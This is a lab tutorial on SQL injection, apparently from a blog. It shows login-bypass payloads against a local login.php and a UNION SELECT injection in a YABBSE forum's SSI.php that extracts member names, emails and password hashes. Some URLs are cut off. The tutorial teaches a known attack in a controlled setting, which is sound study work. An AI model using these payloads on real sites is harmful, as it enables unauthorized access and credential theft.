[01] Open the terminal and type (without prepending prompt symbols):
$ su -
# sql_tutorial_start
These commands will start all needed services in the background.
[02] Open the browser and check http://localhost/phpmyadmin/.
[03] Have a look at the databse userdb that our login.php script is accessing
[04] Have a look at login.php script. To do this, open another terminal and type:
$ vi login.php
or, in case you are not familiar with vi text editor, you can use more user friendly mcedit (or any other editor you wish):
$ mcedit login.php
[05] If you want to see the submitted query to get more information, delete prepending slashes in echo "$query
" line:

[06] Now open the browser again and go to http://localhost/login.php. You will see a page similar to the one below:

SQL_tutorial_02
[07] Enter username admin which we know is existing. As you can see, we cannot login due to the missing password.
[08] Now append a ' to the username to see if the script is vulnerable. The script generates an error, so we can move on.

[09] Enter admin' OR 1=1 as username and see what happens.
[10] Out of the query we can see that we have a closing single quote that isn't opened.
[11] Enter admin 'OR 1='1 as username. Now the query is valid and we're in:

[12] To advance the attack you might whant to check out the /* to comment out all the following. Enter admin' /*" as username then and check the query:
SELECT * FROM `userlist` WHERE `username` = 'admin' /*' AND `password` = ''
is what we entered, but only the part before /* is proccessed by the database. This is why the statement is valid.


II. UNION SELECT
[01] We installed YABBSE under http://localhost/yabbse/. The vulnerable script is located at http://localhost/yabbse/SSI.php.
[02] Open the script in the console by typing:
$ vi /yabbse/SSI.php
or use whichever editor you want. Now move to the line 222, where the query we are trying to manipulate is located.
[03] To get into the function recentTopics, call http://localhost/yabbse/SSI.php?func...r /> [04] In this query a variable $ID_MEMBER is processed. This is where we try to break in. We should now move to http://localhost/yabbse/SSI.php?func..._MEMBER=1' (notice the single quote at the end). This results in an error, so the script is potentially vulnerable to SQL Injection attack.
[05] Out of the error message we can see that a table lmr is referenced in the original query that is now missing. We search for the original query in the editor and append the missing part to our query.

[06] Go to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1) UNION SELECT ID_MEMBER, memberName FROM yabbse_members /*. Out of the error message, we can see that the inserted SELECT statement doesn't have the equal number of queries. We have to add something to make it equal then.

[07] Move your browser to http://localhost/yabbse/SSI.php?func...ics&ID_MEMBER= 1 OR 1=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT memberName, emailAddress, passwd, null, null, null, null, null, null, null, null, null FROM yabbse_members /*. Now we seem to have a valid query, but can only see the e-mail address:

[08] Have a look at line 223 and below. There is a HTML parser to be found that shows the result of our query. So what we have to do now is to mix around our null statements.
[09] Move to http://localhost/yabbse/SSI.php?func...s&ID_MEMBER=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT null, memberName, null, emailAddress, null, passwd,null,null,null,null,null,null FROM yabbse_members /*. There we are - we have managed to obtain all information we wanted:

[10] Return to a terminal opened at the beginning (or open a new one) and issue commands:
$ su -
# sql_tutorial_stop
This will stop all services needed to pass through this tutorial.
Niciun comentariu:
Trimiteți un comentariu